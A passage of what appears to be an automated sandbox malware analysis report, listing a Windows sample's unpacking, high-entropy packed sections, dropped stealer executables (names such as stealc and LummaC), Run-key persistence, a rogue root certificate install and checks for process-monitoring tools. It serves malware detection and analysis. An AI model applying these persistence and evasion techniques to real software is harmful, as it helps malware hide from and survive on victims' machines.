Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: esdsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: scrrun.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: linkinfo.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: textshaping.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: textinputframework.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: coremessaging.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: coremessaging.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: file.exe Static file information: File size 1936896 > 1048576
Source: file.exe Static PE information: Raw size of nkxohnek is bigger than: 0x100000 < 0x1a7400
Source: Binary string: .pdb8 source: axplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rolsroice.pdb source: 66ed86be077bb_12.exe.27.dr
Source: Binary string: rolsroice.pdbX source: 66ed86be077bb_12.exe.27.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 6.2.file.exe.da0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nkxohnek:EW;drssptxt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nkxohnek:EW;drssptxt:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 8.2.skotes.exe.db0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nkxohnek:EW;drssptxt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nkxohnek:EW;drssptxt:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 11.2.skotes.exe.db0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nkxohnek:EW;drssptxt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nkxohnek:EW;drssptxt:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Unpacked PE file: 13.2.3ec4738210.exe.200000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW;
Source: C:\Users\user\1000015002\b74664dd7e.exe Unpacked PE file: 14.2.b74664dd7e.exe.540000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Unpacked PE file: 15.2.3ec4738210.exe.200000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW;
Source: C:\Users\user\1000015002\b74664dd7e.exe Unpacked PE file: 19.2.b74664dd7e.exe.540000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Unpacked PE file: 23.2.610cd559ac.exe.e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qnrefdmv:EW;gekfttam:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qnrefdmv:EW;gekfttam:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Unpacked PE file: 26.2.3ec4738210.exe.200000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 27.2.axplong.exe.6f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qnrefdmv:EW;gekfttam:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qnrefdmv:EW;gekfttam:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 28.2.axplong.exe.6f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qnrefdmv:EW;gekfttam:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qnrefdmv:EW;gekfttam:EW;.taggant:EW;
Source: C:\Users\user\1000015002\b74664dd7e.exe Unpacked PE file: 29.2.b74664dd7e.exe.540000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 30.2.axplong.exe.6f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qnrefdmv:EW;gekfttam:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qnrefdmv:EW;gekfttam:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 41.2.axplong.exe.6f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qnrefdmv:EW;gekfttam:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qnrefdmv:EW;gekfttam:EW;.taggant:EW;
.NET source code contains potential unpacker
Source: acentric[1].exe.27.dr, Form1.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: acentric.exe.27.dr, Form1.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Binary contains a suspicious time stamp
Source: penis[1].exe.27.dr Static PE information: 0xDE289906 [Mon Feb 9 22:02:46 2088 UTC]
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00DF42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 17_2_00DF42DE
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: crypted.exe.27.dr Static PE information: real checksum: 0x0 should be: 0x52b78
Source: 3ec4738210.exe.11.dr Static PE information: real checksum: 0x1c4436 should be: 0x1cedfa
Source: axplong.exe.23.dr Static PE information: real checksum: 0x1d3e08 should be: 0x1cbc28
Source: random[2].exe.27.dr Static PE information: real checksum: 0x1c4436 should be: 0x1cedfa
Source: acentric[1].exe.27.dr Static PE information: real checksum: 0x0 should be: 0x76faf
Source: random[1].exe0.11.dr Static PE information: real checksum: 0x1d3e08 should be: 0x1cbc28
Source: LummaC222222.exe.27.dr Static PE information: real checksum: 0x0 should be: 0x5afcb
Source: skotes.exe.6.dr Static PE information: real checksum: 0x1daa53 should be: 0x1dfca5
Source: random[1].exe1.11.dr Static PE information: real checksum: 0x1c4436 should be: 0x1cedfa
Source: LummaC222222[1].exe.27.dr Static PE information: real checksum: 0x0 should be: 0x5afcb
Source: b74664dd7e.exe.11.dr Static PE information: real checksum: 0x1c4436 should be: 0x1cedfa
Source: crypted[1].exe.27.dr Static PE information: real checksum: 0x0 should be: 0x52b78
Source: stealc_default2[1].exe.27.dr Static PE information: real checksum: 0x0 should be: 0x31181
Source: 2.exe.27.dr Static PE information: real checksum: 0x0 should be: 0xae761
Source: penis[1].exe.27.dr Static PE information: real checksum: 0x0 should be: 0x863c1
Source: 2[1].exe.27.dr Static PE information: real checksum: 0x0 should be: 0xae761
Source: needmoney[1].exe.27.dr Static PE information: real checksum: 0x0 should be: 0x417a7a
Source: acentric.exe.27.dr Static PE information: real checksum: 0x0 should be: 0x76faf
Source: 610cd559ac.exe.11.dr Static PE information: real checksum: 0x1d3e08 should be: 0x1cbc28
Source: stealc_default2.exe.27.dr Static PE information: real checksum: 0x0 should be: 0x31181
Source: file.exe Static PE information: real checksum: 0x1daa53 should be: 0x1dfca5
Source: 4d72d15151.exe.27.dr Static PE information: real checksum: 0x1c4436 should be: 0x1cedfa
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: nkxohnek
Source: file.exe Static PE information: section name: drssptxt
Source: file.exe Static PE information: section name: .taggant
Source: skotes.exe.6.dr Static PE information: section name:
Source: skotes.exe.6.dr Static PE information: section name: .idata
Source: skotes.exe.6.dr Static PE information: section name:
Source: skotes.exe.6.dr Static PE information: section name: nkxohnek
Source: skotes.exe.6.dr Static PE information: section name: drssptxt
Source: skotes.exe.6.dr Static PE information: section name: .taggant
Source: 3ec4738210.exe.11.dr Static PE information: section name:
Source: 3ec4738210.exe.11.dr Static PE information: section name: .rsrc
Source: 3ec4738210.exe.11.dr Static PE information: section name: .idata
Source: 3ec4738210.exe.11.dr Static PE information: section name:
Source: 3ec4738210.exe.11.dr Static PE information: section name: fcorzhao
Source: 3ec4738210.exe.11.dr Static PE information: section name: ykxfeacd
Source: 3ec4738210.exe.11.dr Static PE information: section name: .taggant
Source: b74664dd7e.exe.11.dr Static PE information: section name:
Source: b74664dd7e.exe.11.dr Static PE information: section name: .rsrc
Source: b74664dd7e.exe.11.dr Static PE information: section name: .idata
Source: b74664dd7e.exe.11.dr Static PE information: section name:
Source: b74664dd7e.exe.11.dr Static PE information: section name: fcorzhao
Source: b74664dd7e.exe.11.dr Static PE information: section name: ykxfeacd
Source: b74664dd7e.exe.11.dr Static PE information: section name: .taggant
Source: random[1].exe0.11.dr Static PE information: section name:
Source: random[1].exe0.11.dr Static PE information: section name: .idata
Source: random[1].exe0.11.dr Static PE information: section name:
Source: random[1].exe0.11.dr Static PE information: section name: qnrefdmv
Source: random[1].exe0.11.dr Static PE information: section name: gekfttam
Source: random[1].exe0.11.dr Static PE information: section name: .taggant
Source: random[1].exe1.11.dr Static PE information: section name:
Source: random[1].exe1.11.dr Static PE information: section name: .rsrc
Source: random[1].exe1.11.dr Static PE information: section name: .idata
Source: random[1].exe1.11.dr Static PE information: section name:
Source: random[1].exe1.11.dr Static PE information: section name: fcorzhao
Source: random[1].exe1.11.dr Static PE information: section name: ykxfeacd
Source: random[1].exe1.11.dr Static PE information: section name: .taggant
Source: 610cd559ac.exe.11.dr Static PE information: section name:
Source: 610cd559ac.exe.11.dr Static PE information: section name: .idata
Source: 610cd559ac.exe.11.dr Static PE information: section name:
Source: 610cd559ac.exe.11.dr Static PE information: section name: qnrefdmv
Source: 610cd559ac.exe.11.dr Static PE information: section name: gekfttam
Source: 610cd559ac.exe.11.dr Static PE information: section name: .taggant
Source: axplong.exe.23.dr Static PE information: section name:
Source: axplong.exe.23.dr Static PE information: section name: .idata
Source: axplong.exe.23.dr Static PE information: section name:
Source: axplong.exe.23.dr Static PE information: section name: qnrefdmv
Source: axplong.exe.23.dr Static PE information: section name: gekfttam
Source: axplong.exe.23.dr Static PE information: section name: .taggant
Source: random[2].exe.27.dr Static PE information: section name:
Source: random[2].exe.27.dr Static PE information: section name: .rsrc
Source: random[2].exe.27.dr Static PE information: section name: .idata
Source: random[2].exe.27.dr Static PE information: section name:
Source: random[2].exe.27.dr Static PE information: section name: fcorzhao
Source: random[2].exe.27.dr Static PE information: section name: ykxfeacd
Source: random[2].exe.27.dr Static PE information: section name: .taggant
Source: 4d72d15151.exe.27.dr Static PE information: section name:
Source: 4d72d15151.exe.27.dr Static PE information: section name: .rsrc
Source: 4d72d15151.exe.27.dr Static PE information: section name: .idata
Source: 4d72d15151.exe.27.dr Static PE information: section name:
Source: 4d72d15151.exe.27.dr Static PE information: section name: fcorzhao
Source: 4d72d15151.exe.27.dr Static PE information: section name: ykxfeacd
Source: 4d72d15151.exe.27.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00DCD91C push ecx; ret 11_2_00DCD92F
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E10A76 push ecx; ret 17_2_00E10A89
Source: file.exe Static PE information: section name: entropy: 7.982641711189707
Source: file.exe Static PE information: section name: nkxohnek entropy: 7.953823653253661
Source: skotes.exe.6.dr Static PE information: section name: entropy: 7.982641711189707
Source: skotes.exe.6.dr Static PE information: section name: nkxohnek entropy: 7.953823653253661
Source: 3ec4738210.exe.11.dr Static PE information: section name: fcorzhao entropy: 7.953583099269891
Source: b74664dd7e.exe.11.dr Static PE information: section name: fcorzhao entropy: 7.953583099269891
Source: random[1].exe0.11.dr Static PE information: section name: entropy: 7.9824800968412175
Source: random[1].exe0.11.dr Static PE information: section name: qnrefdmv entropy: 7.954647787076299
Source: random[1].exe1.11.dr Static PE information: section name: fcorzhao entropy: 7.953583099269891
Source: 610cd559ac.exe.11.dr Static PE information: section name: entropy: 7.9824800968412175
Source: 610cd559ac.exe.11.dr Static PE information: section name: qnrefdmv entropy: 7.954647787076299
Source: axplong.exe.23.dr Static PE information: section name: entropy: 7.9824800968412175
Source: axplong.exe.23.dr Static PE information: section name: qnrefdmv entropy: 7.954647787076299
Source: 2[1].exe.27.dr Static PE information: section name: .text entropy: 6.8715374332529295
Source: 2.exe.27.dr Static PE information: section name: .text entropy: 6.8715374332529295
Source: crypted[1].exe.27.dr Static PE information: section name: .text entropy: 7.994735225546955
Source: crypted.exe.27.dr Static PE information: section name: .text entropy: 7.994735225546955
Source: random[2].exe.27.dr Static PE information: section name: fcorzhao entropy: 7.953583099269891
Source: 4d72d15151.exe.27.dr Static PE information: section name: fcorzhao entropy: 7.953583099269891

Persistence and Installation Behavior
barindex
Installs new ROOT certificates
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\splwow64[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\needmoney[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\newbundle2[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Blenar[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\gold[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000285001\2.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\crypted[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\LummaC222222[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\1000015002\b74664dd7e.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\acentric[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000308001\4d72d15151.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000318001\66ed86be077bb_12.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66ed86be077bb_12[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000321001\2.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[2].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\2[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\2[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000340001\Blenar.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b74664dd7e.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run splwow64.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4d72d15151.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3ec4738210.exe Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: FilemonClass
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: RegmonClass
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: FilemonClass
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: Regmonclass
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: Filemonclass
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: PROCMON_WINDOW_CLASS
